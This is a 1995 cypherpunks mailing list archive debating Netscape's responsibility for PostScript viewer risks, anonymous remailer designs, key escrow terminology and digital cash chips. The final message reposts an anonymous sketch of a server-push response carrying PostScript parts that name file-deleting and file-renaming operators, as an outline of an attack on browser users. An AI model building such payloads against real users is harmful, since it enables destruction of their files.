	using them to view files of unknown origin, and who have removed
	all other known, unknown, and/or undisclosed security holes from
	their systems.  Otherwise, Netscape is insecure and should not be
	trusted."

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rob.Lowry@on-ramp.ior.com (Rob Lowry)
Date: Wed, 18 Oct 95 07:58:12 PDT
To: Leo_Martensen_at_~~HEID-DHS@ccmail.odedodea.edu
Subject: Re: I want to learn!
Message-ID: <m0t5ZwP-000RomC@on-ramp.ior.com>
MIME-Version: 1.0
Content-Type: text/plain


>     
>>Can someone please show me the ropes on becomeing a cypherpunk!!!! Thanxs.
>     
>     Me Too, I'm catching on but some help would help !
>     
>     
>     Leo_Martensen_at_~~HEID-DHS@ccmail.odedodea.edu



 1)Read the FAQ (sorry.. don't have the address for it handy.. Tim, ya got
it?<g>)
 2)Read up on crypto, politics and economics.. mighty dry reading for most,
but damn    useful around here.
 3)Practice safe encryption- Use PGP or any other encryption you are
comfortable with.
   But be sure to always use it. (Wrap that data)
 4)Develope a strong urge for privacy and then strongly fight to protect it.
This means
   you may have to write letters to Congress and the Senate, may have to
defend yourself
   to non-crypto orientated folks, and so on..
 5)Practice what you preach, and preach what you practice. Share the
knowledge with
   anyone who is interested..
 6)Send $10.50 to me for the genuine 'Cypherpunks Starter kit' which
includes a cheat
   sheet of really cool Jargon, a pair of black sunglasses, and high quality
laser reprints of the FAQ..
   mail that to: Cypherpunk
                 PO Box 288
                 Rockford, Wa 99030
<g> RobL

------------------|-----------------------------------------------------------
Rob Lowry         |                   
PO Box 288        | 
Rockford Wa 99030 | ral@otc.mhs.compuserve.com           robl@on-ramp.ior.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Wed, 18 Oct 95 08:02:42 PDT
To: s1018954@aix2.uottawa.ca
Subject: Re: DalSemi: Add-Only Memory for Storage of Digital Cash
In-Reply-To: <Pine.3.89.9510172053.A73291-0100000@aix2.uottawa.ca>
Message-ID: <199510181204.IAA01662@nrk.com>
MIME-Version: 1.0
Content-Type: text/plain


Someone said:
> > Some enterprising cypherpunks can buy a bunch and resell 'em for cash.
> > 
> And then sell the serial address for cash.

CypherChip Party. Pick up one chip from pile and leave one chip, or
leave $$.

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rob.Lowry@on-ramp.ior.com (Rob Lowry)
Date: Wed, 18 Oct 95 08:11:22 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: Postscript in Netscape
Message-ID: <m0t5a8t-000RomC@on-ramp.ior.com>
MIME-Version: 1.0
Content-Type: text/plain


 
>>   Obviously everyone should heed perry's warnings and emasculate
>> their postscript interpreters before using them to view files
>> of unknown origin.
>
>WRONG!!! Netscape claims to be "secure" - hence it is Netscape's job to
>be secure - regardless of the user's use of their product.  Otherwise,
>the ads should read:
>
>	"Netscape can be used securely by sufficiently knowledgeable
>	users who have emasculated their postscript interpreters before
[SNIP]


I have to disagree here.. There is such a thing as overstating the obvious.
And a statement such as the one you propose is definately in that range. If
the user is 
knowledgable about system ops that come from external apps, such as the PS
interpreters, Java or whatever, then they should take appropriate security
measures themselves. If they are not skilled or versed in such subjects, you
can bet they will be after the first incident of 'cyber-vandalism'.
Ignorance is not bliss, and you, and only you, are responsible for
protecting yourself in 'cyberspace'.

Heck, I can see it now:
       "Sex can be used by sufficiently knowledgeable
	users who have educated their partners before
	using them to attempt comply to acts of contortion,
        sustained physical activity, voluntary dehydration,
        and who have removed all other known, unknown, and/or 
        undisclosed partners from their systems.  Otherwise, 
        sex unsafe and should not be attempted."

Again, overstating the obvious...

RobL
------------------|-----------------------------------------------------------
Rob Lowry         |                   
PO Box 288        | 
Rockford Wa 99030 | ral@otc.mhs.compuserve.com           robl@on-ramp.ior.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Charles Gimon" <gimonca@mirage.skypoint.com>
Date: Wed, 18 Oct 95 06:32:09 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape PR
Message-ID: <m0t5Ya3-00053JC@skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


Forwarded message:

> 
>   If you wish to get an official statement from Netscape, you should
> contact our PR department.  Their number is 415-528-2802.
> 

They don't have e-mail?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Wed, 18 Oct 95 05:35:41 PDT
To: jsw@netscape.com (Jeff Weinstein)
Subject: Re: Postscript in Netscape
In-Reply-To: <3084F191.56FE@netscape.com>
Message-ID: <9510181233.AA12939@all.net>
MIME-Version: 1.0
Content-Type: text


> > WRONG!!! Netscape claims to be "secure" - hence it is Netscape's job to
> > be secure - regardless of the user's use of their product.  Otherwise,
> > the ads should read:
> > 
> >         "Netscape can be used securely by sufficiently knowledgeable
> >         users who have emasculated their postscript interpreters before
> >         using them to view files of unknown origin, and who have removed
> >         all other known, unknown, and/or undisclosed security holes from
> >         their systems.  Otherwise, Netscape is insecure and should not be
> >         trusted."
> 
>   Why did I know you would be showing up in this discussion?  You
> wouldn't be related to alice de 'nonymous would you?

Is it Netscape's position that when people call them on their statements
they make irrelevant comments and inflamatory remarks toward legitimate
researchers who are freely helping them understand the security issues
they apparently don't understand?

>   I don't believe that Netscape claims to be some magic bullet that
> will suddenly make your system secure when you install it.  We also
> don't claim that it will detect viruses.

You claim that you provide secure net access for the purposes of
transactions - which you don't - and you have gotten an enormous amount
of money from people who don't understand these issues based, at least
in part, on your false claims.  Some people might interpret that as fraud.

Now instead of trying to insult and put down people who have legitimate
security concerns, you personally attack individuals, try to redirect the
discussion away from the security flaws in Netscape, and try to hush the
discussion with:

>   Dont you think we've wasted enough bandwidth on this?  I'm sure
> most readers of this list are sick of it by now.

I think that you should give a copy of this and the other messages on
this topic to someone at Netscape who is responsible for protection and
ask them to speak for the company and address these issues head on. 
Regardless of your disclaimer, when you speak on the net, we hear
Netscape, and the sounds are starting to sound more and more like
Microsoft to me.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Wed, 18 Oct 95 08:41:38 PDT
To: jsw@netscape.com (Jeff Weinstein)
Subject: Re: Postscript in Netscape
In-Reply-To: <3084F191.56FE@netscape.com>
Message-ID: <199510181536.IAA24732@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> > WRONG!!! Netscape claims to be "secure" - hence it is Netscape's job to
> > be secure - regardless of the user's use of their product.  Otherwise,
> > the ads should read:
> > 
> >         "Netscape can be used securely by sufficiently knowledgeable
> >         users who have emasculated their postscript interpreters before
> >         using them to view files of unknown origin, and who have removed
> >         all other known, unknown, and/or undisclosed security holes from
> >         their systems.  Otherwise, Netscape is insecure and should not be
> >         trusted."

	That's bullshit. Netscape can't control every user's entire
environment. It's Netscape's job to produce a secure product. If the
users of said product decide to shoot themselves in the foot by
configuring it insecurely that is there problem. It is in Netscape's
best interest to make it difficult to configure insecurely, but
impossible to prevent.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nesta Stubbs <nesta@cynico.com>
Date: Wed, 18 Oct 95 06:46:41 PDT
To: cypherpunks@toad.com
Subject: Re: Postscript in Netscape
In-Reply-To: <9510181156.AA11525@all.net>
Message-ID: <Pine.BSD.3.91.951018082550.22548B-100000@miso.wwa.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 18 Oct 1995, Dr. Frederick B. Cohen wrote:

> WRONG!!! Netscape claims to be "secure" - hence it is Netscape's job to
> be secure - regardless of the user's use of their product.  Otherwise,
> the ads should read:
>
That just doesn't make all that much sense.  "regardless of the users use 
of their product"?  Sure, like PGP should be considered insecure software 
because as a user I could use it on an ISP, and make my passwd two 
characters long and leave it set as an environment variable in the shell 
for the pre-mail script I have.  
 
> 	"Netscape can be used securely by sufficiently knowledgeable
> 	users who have emasculated their postscript interpreters before
> 	using them to view files of unknown origin, and who have removed
> 	all other known, unknown, and/or undisclosed security holes from
> 	their systems.  Otherwise, Netscape is insecure and should not be
> 	trusted."

No, otherwise the postscript viewer is insecure.  Netscape is not 
handling the postscript code, just passing it along.  It does not come 
with an application for postscript automagically setup for the user so 
you can't blame it for spawning an application without the users 
knowledge.  Maybe there should(or is there already) be a note in the docs 
mentioning this, but of all the regular users I know, none of them read 
documentation.  To expect a system to call itself insecure because the 
user is stupid and invites evil in doesn't make much sense.  So I guess 
Java can NEVER be secure because if I want I can enable native calls and 
all the file access classes and other dangerous stuff for any application 
I want to and shut down all the inbuilt security.  It's Suns fault that 
I'm dumb as a brick wall?

Nesta Stubbs		     "Betsy, can you find the Pentagon for me? 
Cynico Network Consulting     It has five sides and a big parking lot" 
nesta@cynico.com			-Fred McMurray-





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Wed, 18 Oct 95 08:45:23 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: Postscript in Netscape
In-Reply-To: <9510181233.AA12939@all.net>
Message-ID: <199510181539.IAA24928@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> Regardless of your disclaimer, when you speak on the net, we hear
> Netscape, and the sounds are starting to sound more and more like
> Microsoft to me.


	Speak for yourself. When Jeff posts, I hear (fancy that!)
Jeff.

	In any case, it might be wise for Jeff to get a non-netscape
account to do his cypherpunks posting from, so as to avoid
confusion. (ObPlug: Community ConneXion offers mailboxes for just
$5/month -- shell accounts for $7.50 ;-)

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Herb Sutter <herbs@interlog.com>
Date: Wed, 18 Oct 95 05:47:20 PDT
To: Modemac <modemac@netcom.com>
Subject: Re: Anonymity: A Modest Proposal
Message-ID: <199510181244.IAA03196@gold.interlog.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:58 10.18.1995 -0700, Modemac wrote:
>     1) A person writes a message and encrypts it with PGP.

Using a set public key?  Which would mean the remailers all share the same
pub/pri key pair (or pieces thereof)?  You'll have to come up with a good
way of maintaining this secret, since if you're not careful it could be
compromised by something as simple as an attacker's trying to attach a new
remailer to the remailer group or physically attack any existing remailer.

>     2) That person then posts his message to the "anonymous messages"
>        newsgroup.
>     3) A remailer scanning the newsgroup picks up the message,
>        decrypts it, strips the headers and makes it anonymous, and
>        sends it to its destination.

Not only is the anonymity of the entire traffic load compromised if the
single shared private key is compromised, but even if the secret is kept the
newsgroup articles' headers being posted in the clear still opens this
scheme to traffic analysis (even if you put it a short random remailer
delay, as you say later on; computers are very good at sifting through large
volumes of data to find this kind of pattern, especially if the remailer
delay's upper bound is known (you proposed two hours)).

>The actual remailer code, involving scanning the newsgroup for
>PGP-encrypted messages and stripping headers, could be written with
>PERL scripts.  This would keep it portable, and it would be easy for 
>a person to tell if it has been tampered with.  This code would be
>distributed widely.

...and if someone installs their own remailer and adds it to the group, and
therefore it must get the complete shared private key at some point (of
necessity, else it couldn't decrypt the messages), and then the attacker can
just look at the key and decrypt all traffic...?

Herb

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Herb Sutter                 2228 Urwin, Suite 102       voice (416) 618-0184
Connected Object Solutions  Oakville ON Canada L6L 2T2    fax (905) 847-6019





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nesta Stubbs <nesta@cynico.com>
Date: Wed, 18 Oct 95 06:53:43 PDT
To: cypherpunks@toad.com
Subject: Re: Postscript in Netscape
In-Reply-To: <9510181233.AA12939@all.net>
Message-ID: <Pine.BSD.3.91.951018083946.22548C-100000@miso.wwa.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 18 Oct 1995, Dr. Frederick B. Cohen wrote:

> Is it Netscape's position that when people call them on their statements
> they make irrelevant comments and inflamatory remarks toward legitimate
> researchers who are freely helping them understand the security issues
> they apparently don't understand?
> 
Jeff doesn't speak directly for Netscape, Doc.  Your previous suggestion 
didn't make much sense, the idea that a single peice of software must 
close ALL the holes across the board to be called "secure" is ludicrous.  
Granted it should cover all within it's domain, and provide safegaurds, 
but to expect Netscape to handle security problems that rightfully should 
be fixed in the TCP/IP protocol stack, or in the interprator for another 
language that happens to have a security hole and can be spawned off.  
Netscape does not come with a postscript app preset so the user has to 
make a conscious choice.  All postscript viewers I have used make mention 
of these security problems, and I would hope(tho do not for one second 
believe) that users read this warnings.  If they don't and set-up the 
browser to spawn off files of unknown origins, then they are taking their 
own risks and I do not think for one second netscape could be held 
responsible.  There is no defense against the dreaded DEU hole that 
exists on all systems.




Nesta Stubbs		     "Betsy, can you find the Pentagon for me? 
Cynico Network Consulting     It has five sides and a big parking lot" 
nesta@cynico.com			-Fred McMurray-





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Patrick Horgan <patrick@Verity.COM>
Date: Wed, 18 Oct 95 09:03:04 PDT
To: cypherpunks@toad.com
Subject: Digital Signature Guidelines
Message-ID: <30852451.45E4@verity.com>
MIME-Version: 1.0
Content-Type: text/plain


It seems that your embedded viewer doesn't want to work on my
UNIX box.  It makes it quite hard to comment on your
guidlines.  Apparently, from the way you're presenting this you
have no real desire to get any industry consensus.  Perhaps you
only want people that use Windows to have an oportunity to comment.
Mac users and Unix users not welcome.  I find the whole need to 
have yet another viewer annoying.  Haven't you guys heard of 
industry standards?

Annoyed,

Patrick J. Horgan
-- 
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 18 Oct 95 09:38:06 PDT
To: cypherpunks@toad.com
Subject: Re: Anonymity: A Modest Proposal
In-Reply-To: <9510181554.AA05280@toad.com>
Message-ID: <199510181636.JAA17879@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Eli Brandt <eli@UX3.SP.CS.CMU.EDU> writes:

>If you
>split the message into shadows, you avoid having anyone in this
>position.

I think splitting the message would be OK, but then the question is who
is responsible for reassembling it?  If there were a "reassembly
server" which took such messages, assembled them, and forwarded them,
then we would be right back where we started from.  If the end user is
responsible for reassembly, then that is tantamount to voluntarily
agreeing to receive anonymous messages, and that is no problem.  The
complaints we get are virtually 100% from people who didn't want to
receive such messages, or see them posted.  And of course anonymous news
postings via shadows would also have the reassembly problem.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Wed, 18 Oct 95 09:38:17 PDT
To: "Dr. Frederick B. Cohen" <fc@all.net>
Subject: Re: Postscript in Netscape
In-Reply-To: <9510181233.AA12939@all.net>
Message-ID: <Pine.SOL.3.91.951018092256.1621B-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 18 Oct 1995, Dr. Frederick B. Cohen wrote:
> 
> You claim that you provide secure net access for the purposes of
> transactions - which you don't - and you have gotten an enormous amount
> of money from people who don't understand these issues based, at least
> in part, on your false claims.  Some people might interpret that as fraud.
> 

Well, assuming that US law follows british practice in this regard, it
would seem that those people would be wrong- to prove fraud, you would
need to show intent to commit fraud, and it's been obvious for a long long
time that Netscape's security holes are the result of lack of experience
rather than malice of any kind. Would you have a security expert write
your graphics engine? 

Microsoft is the Evil Empire; Netscape is  a Naughty Principality. 

Simon

 ----
(defun modexpt (x y n)  "computes (x^y) mod n"
  (cond ((= y 0) 1) 	((= y 1) (mod x n))
	((evenp y) (mod (expt (modexpt x (/ y 2) n) 2) n))
	(t (mod (* x (modexpt x (1- y) n)) n))))





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 18 Oct 95 09:43:43 PDT
To: cypherpunks@toad.com
Subject: Re: Anonymity: A Modest Proposal
In-Reply-To: <v02120d02acaa97afa587@DialupEudora>
Message-ID: <199510181642.JAA18712@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


tbyfield@panix.com (t byfield) writes:

>        Well, when some folks want to circumvent this kind of last-link
>accountability (even if they are the _only_ link), they simply forge their
>headers--so why not incorporate that tactic into the remailer net?

I think a remailer which forged headers would get people even angrier
than one which was up front about what it was doing.  Forging headers is
really considered antisocial by a lot of people on the net.  If you could
do it safely, you wouldn't need remailers.  Since you need them, it's not
safe, hence the message will probably get traced back to the remailer.
This is prima facie evidence to get an account yanked at a lot of places.

>        Also, maybe apropos...It seems to me that there should be a way,
>within the remailer net, to synthesize forged-path strings with the "Human
>ID through insecure channel" remarks you made a few days ago.

The "human ID" thing requires a shared secret at both ends, which isn't
generally practical between a customer and a remailer.  Also, it was
specific to the needs of human minds; if you have a computer and a shared
secret you do a lot better to use DES or IDEA (and let the shared secret
be the key), and even without a shared secret you can use public key
techniques for identification and authentication.  So I don't think the
human ID approach would be relevant here.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Willis H. Ware" <willis@rand.org>
Date: Wed, 18 Oct 95 10:03:53 PDT
To: Michael Froomkin <froomkin@law.miami.edu>
Subject: Re: YOUR chat with Goeff Greiveldinger
Message-ID: <199510181703.KAA29941@conrad.rand.org>
MIME-Version: 1.0
Content-Type: text/plain


--
Folder: YES
--

Michael:

Your message was forwarded to me and I presume to address this mail
list although I would normally not.

If you still have time for adjustments to your talk, let me call your
attention to what I believe to be an awkward semantic ambiguity in the
current dialogue about encryption.  I quizzed a few people about usage
of "escrow" and "key escrow" so I have some confidence that the
following facts and argument are valid.

The term "escrow", in the context of cryptography, was introduced by
the so-called Clipper Initiative in the United States, April 1993.  It
had not previously been associated with cryptography.

As initially used in association with Clipper, escrow implies [1] a
chip-unique key (equivalent to a chip-unique master-key) used only for
law enforcement access, [2] splitting of the chip key into parts held
by [3] extra-organization trusted third parties, [4] automatic
inclusion of the chip key with every use of the encryption but [5]
protected with yet another secret key embedded in the encryption chip
which is itself [6] protected against reverse engineering or external
access to its details.  The concept, at the time of its introduction,
was oriented solely to communications intercept and hence, [7] a "law
enforcement access field" would be a required part of every
transmission.  The LEAF contains chip identity which in turn allows
law enforcement to solicit components of the master key from escrow
agents, then to recover the session key and eventually the encrypted
traffic.

NOTE first that this use of the word violates the common legal usage in
which the parties who deposit material with an "escrow agent"
themselves have access to it at some point. In the Clipper use, the
parties obviously do not have access to what the escrow agencies hold.

Subsequently the concept of mimicing the hardware-based Clipper
approach in software arose, and the term "commercial key escrow" was
applied to it.  Some of the details are the same as Clipper; in
particular, something is to be held by trusted third parties which, in
some proposals, are called Data Recovery Centers.  Some proposals plan
to replicate Clipper by depositing split master keys with trusted
third parties; law enforcement with proper authorization can acquire
the parts of the master key, deduce the actual key used for a given
transmission (i.e., the session key) and so decrypt the traffic.
Other proposals depart from Clipper and plan to store split (or not)
actual session keys with the trusted agents.

NOTE that the observation above that using escrow in the context of
encryption by Clipper violates legal usage is generally invalid for
commercial key escrow.  The party which deposits keys with a Data
Recovery Center obviously can access to them.

Inevitably, the concept was extended further to include the possibility
that corporations could retain the keys internally in a specially
trusted part of the organization.  Legal entities, such as
corporations, would be subject to extant procedures of the law
enforcement court order or subpoenas to provide the keys under
authorized circumstances.  As to be expected, such intra-
organizational protective retention of keys was called by some
escrow, or by others self-escrow.  However, the departure from Clipper
was even more extensive because:

    o There is probably no need for splitting such keys,

    o There probably would be no need for a complex master-key
     approach such as embodied in Clipper, and

    o There might not need to be a "law enforcement access field" in
     externally transmitted messages.

As so often is the case in computer-related matters, the terminology
is not clearly established.  One way to clarify it would be:

     [A] To confine the term "escrow" to situations in which some key,
     split or not, master or session, will be stored with
     extra-organizational trusted parties who make keys available only
     to law enforcement; but

     [B] For the intra-organizational situation or the
     extra-organizational situation in which the depositing party can
     have access to the keys, adopt the term "archive" or "key
     archive".

     The term "key backup" might be used in the image of conventional
     backups of data bases and files; but the term "archive" or "key
     archive" would hopefully avoid confusion.

If one were to follow this taxonomy, then "Commercial Key Escrow",
should be called "Commercial Key Archive" and the process of depositing
keys therein should be called "key archiving."

I would not stand strongly for picking "archive" as an appropriate
term but something different from "escrow" is clearly needed to keep
the dialogue leading to a national crypto-policy precise, unambiguous,
and clean.

Obviously it's your call whether you choose to adopt these semantic
views in your conversations with Geof.  At minimum, you should be alert
to loose usage of "escrow" as a concept.

					Willis




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Wed, 18 Oct 95 07:23:36 PDT
To: cypherpunks <cypherpunks@toad.com>
Subject: ABA Draft Digital Signature Guidelines Open for Comment
Message-ID: <Pine.SUN.3.91.951018095008.14293E-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


The long-delayed ABA draft digital signature guidelines are now available 
for public comment.  This is potentially an important document, and is 
worth some time for those interestested in the legal and economic effects 
of digital signatures.  An internet version and more info can be found at:

http://www.intermarket.com/ecl/digsgleg.html

The comment period ends Nov 30, 1995, so don't delay.

Due to the ABA's Section on Science and Technology's fear that its
intellectual property will be ripped off, the document is in a strange
"read-only" format, relying on the "Common Ground Mini-Viewer".  The
program has been designed to prevent users from printing their own copy of
the document.  Paper copies can be ordered from the ABA for $15 (see
website for details). 

I would apologize on behalf of the ABA Information Security Committee for
this user-unfriendly method of distributing the document (it certainly
makes quoting from it in your comments difficult!), but the Chair of the
Committee, Michael Baum, unilaterally removed me from the Committee a few 
days ago.

I nonetheless urge you to read this interesting document. 

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's hot here.  And humid.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Wed, 18 Oct 95 08:32:30 PDT
To: s1018954@aix2.uottawa.ca
Subject: Re: DalSemi: Add-Only Memory for Storage of Digital Cash
In-Reply-To: <Pine.3.89.9510172053.A73291-0100000@aix2.uottawa.ca>
Message-ID: <199510181530.LAA00339@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


s1018954@aix2.uottawa.ca writes:
>On Tue, 17 Oct 1995, Scott Brickner wrote:
>
>> Nathan Loofbourrow writes:
>> >And there's another item of note: each chip has a unique, etched,
>> >machine-readable serial number. What are the bets that Dallas
>> >Semiconductor can tell you who purchased that chip? Well, so much for
>> >an anonymous payment scheme based on *this* product.
>> 
>> Some enterprising cypherpunks can buy a bunch and resell 'em for cash.
>> 
>And then sell the serial address for cash.
>How do I know that they (this means YOU! :> ) don't work for the company?
>(which is a contracter for, blackmail-victim of, tentacle of NSA, CSE, 
>TCMAY, Purplenet, your fairy-stepmother ...)

Big deal.  NSA now knows "someone bought address X".

That's the great thing about cash you know... anonymity.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Wed, 18 Oct 95 02:42:06 PDT
To: cypherpunks@toad.com
Subject: The Anonymous Bounty Claim
In-Reply-To: <199510180451.VAA23663@infinity.c2.org>
Message-ID: <Pine.HPP.3.91.951018101847.20167A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain



> sameer wrote:
> > Phil Karlton wrote:

> > I am not quite sure what problem you are talking about? NFS and MITM
> > ftp attacks?

> 	This character has been going on and oon regarding some big
> hole he apparently found in netscape, but no one else on the list
> seems to have noticed anything, or replicated any alleged claims he
> may have made. Maybe if the person in question would repost this
> alleged post describing some massive hole, it would help us all.

I am not technically competent to judge if his/her claim is worth
reposting, but here it is, clipped from the very long Friday 13
rant, as found at Raph's index site (Subject: Bugs Bounty??...shhh...
I'm huntin wa'bits... From:anonymous-remailer@shell.portal.com).

Mats
___________________________________________________________________

<long first part deleted; general aspects on the Bounty Hunt>

And this is where we introduce a little old document called pushpull.html.
from Netscape's Web site. It's titled: An Exploration of Dynamic
Documents. 

> The Great Idea
> 
> The general idea is that browsers have always been driven by user
> input. You click on a link or an icon or an image and some data comes
> to you. As soon as people saw they could do that, they wanted to give
> a server the ability to push new data down to the browser. (An
> obvious example is a stock trader who wants to see new quote data
> every 5 minutes.) Up until now, that hasn't been possible.

And I can think of many people who would _also_ like to push down data
to a browser. But, that's not a great idea. Guess what?? It's not even 
a good idea. It might even be a bad idea.

> Netscape Navigator 1.1 gives content creators and server
> administrators two new open standards-based mechanisms for making this
> work. The mechanisms are similar in nature and effect, but
> complementary. They are: 
>
> Server push -- the server sends down a chunk of data; the
> browser display the data but leaves the connection open; whenever
> the server wants it sends more data and the browser displays it,
> leaving the connection open; at some later time the server sends
> down yet more data and the browser displays it; etc.

Yes, the client "processes data" and then possibly displays it, while in

> Client pull -- the server sends down a chunk of data,
> including a directive (in the HTTP response or the document
> header) that says "reload this data in 5 seconds", or "go load
> this other URL in 10 seconds". After the specified amount of
> time has elapsed, the client does what it was told -- either
> reloading the current data or getting new data.

Hmm. Netscape's clients blindly trust and follows server's instructions
and does what it is told to do. If it's told to load a particular
document in five seconds. It does that. It dances to the server's
instructions. Something which should cause any Security Administrator's
hair to stand on end, as the server takes control of the client's machine 
and "manipulates it".

> In server push, the magic is accomplished by using a variant of the
> MIME message format "multipart/mixed", which lets a single message (or
> HTTP response) contain many data items. In client pull, the magic is
> accomplished by an HTTP response header (or equivalent HTML tag) that
> tells the client what to do after some specified time delay. 
>
> For server push we use a variant of "multipart/mixed" called
> "multipart/x-mixed-replace". The "x-" indicates this type is
> experimental. The "replace" indicates that each new data block will
> cause the previous data block to be replaced -- that is, new data will
> be displayed instead of (not in addition to) old data. 
> 
> So here's an example of "multipart/x-mixed-replace" in action: 

>>Content-type: multipart/x-mixed-replace; boundary=ThisRandomString
>>
>>--ThisRandomString
>>Content-type: text/plain
>>
>>Data for the first object.
>>
>>--ThisRandomString
>>Content-type: text/plain
>>
>>Data for the second and last object.
>>
>>--ThisRandomString--
> 
> The key to the use of this technique is that the server does not push
> the whole "multipart/x-mixed-replace" message down all at once but
> rather sends down each successive data block whenever it sees
> fit. 

And this is the problem. We have a pipe. And we have a server making a
decision when it will send the next data block. I guess the server could
also decide dynamically what that data block is going to be once it has
opened it's pipe to the client. 

That is way too much trust for a client to place in a server that it 
doesn't know if it can trust.

> The HTTP connection stays open all the time, and the server
> pushes down new data blocks as rapidly or as infrequently as it wants,
> and in between data blocks the browser simply sits and waits for more
> data in the current window. The user can even go off and do other
> things in other windows; when the server has more data to send, it
> just pushes another data block down the pipe, and the appropriate
> window updates itself. 

Yep, the appropriate window just "updates" itself at the command of 
the server. A good faith update ... or let's call it a good faith 
process. 

> So here's exactly what happens:
>
> Following in the tradition of the standard "multipart/mixed",
> "multipart/x-mixed-replace" messages are composed using a unique
> boundary line that separates each data object. Each data object
> has its own headers, allowing for an object-specific content type
> and other information to be specified.

Let's emphasize that what we have is a slave client at one end of a pipe
accepting an object-specific content-type from any server. 

This is not within the tradition of multipart/mixed. 

And this is a problem.

> The specific behavior of "multipart/x-mixed-replace" is that each
> new data object replaces the previous data object. The browser
> gets rid of the first data object and instead displays the second
> data object. 
>
> A "multipart/x-mixed-replace" message doesn't have to end! That
> is, the server can just keep the connection open forever and send
> down as many new data objects as it wants. The process will then
> terminate if the user is no longer displaying that data stream in
> a browser window or if the browser severs the connection
> (e.g. the user presses the "Stop" button). We expect this will
> be the typical way people will use server push. 
>
> The previous document will be cleared and the browser will begin
> displaying the next document when the "Content-type" header is
> found, or at the end of the headers otherwise, for a new data block.
> The current data block (document) is considered finished when the
> next message boundary is found. 
>
> Together, the above two items mean that the server should push
> down the pipe: a set of headers (most likely including
> "Content-type"), the data itself, and a separator (message
> boundary). When the browser sees the separator, it knows to sit
> still and wait indefinitely for the next data block to arrive. 

Now let's play with the prior example. Let's say that we utilized
different types of objects. I'll use multipart/parallel and
application/postscript. 

>>Content-type: multipart/x-mixed-replace; boundary=ThisRandomString
>>
>>--ThisRandomString
>>Content-type: application/postscript
>>
>>Data for the first object
>>
>>--ThisRandomString
>>Content-Type: multipart/parallel; boundary=ThisSecondRandomString
>>
>>--ThisSecondRandomString
>>Content-Type: application/postscript
>>
>>Data for the second object
>>
>>--ThisSecondRandomString
>>Content-type: application/postscript
>>
>>Deletefile
>>Renamefile
>>Filenameforall
>>File
>>
>>--ThisSecondRandomString--
>>
>>--ThisRandomString--

I think that the foregoing explains itself without me having to draw any
more maps, than is absolutely necessary. The first data object sent is
application/postscript. The second object is multipart/parallel. 

And it's where we conflict with federal requirements:

